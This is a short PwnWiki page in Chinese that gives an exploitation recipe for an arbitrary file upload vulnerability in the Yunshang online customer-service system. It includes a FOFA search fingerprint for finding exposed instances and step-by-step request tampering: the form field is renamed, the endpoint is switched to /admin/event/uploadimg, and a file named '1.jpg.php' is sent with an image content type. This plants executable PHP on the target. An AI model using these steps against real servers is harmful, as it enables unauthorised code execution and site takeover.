雲尚在線客服系統任意文件上傳漏洞

From PwnWiki
Revision as of 10:08, 22 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> body="cgwl.ico" </pre> ==漏洞利用== 訪問 <pre> /index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1&groupid=0&special=1 //默認ID為1 接...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

body="cgwl.ico"

漏洞利用

訪問 

/index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1&groupid=0&special=1
//默認ID為1 接入客服 點擊圖片上傳抓包
參數修改
Content-Disposition: form-data; name="upload"
修改為
Content-Disposition: form-data; name="editormd-image-file"

POST請求
/admin/event/upload
改為
/admin/event/uploadimg
POST /admin/event/uploadimg HTTP/1.1
Host: target
...

Content-Disposition: form-data; name="editormd-image-file"; filename="1.jpg.php"
Content-Type: image/png
Retrieved from "https://pwnwiki.com/index.php?title=雲尚在線客服系統任意文件上傳漏洞&oldid=3027"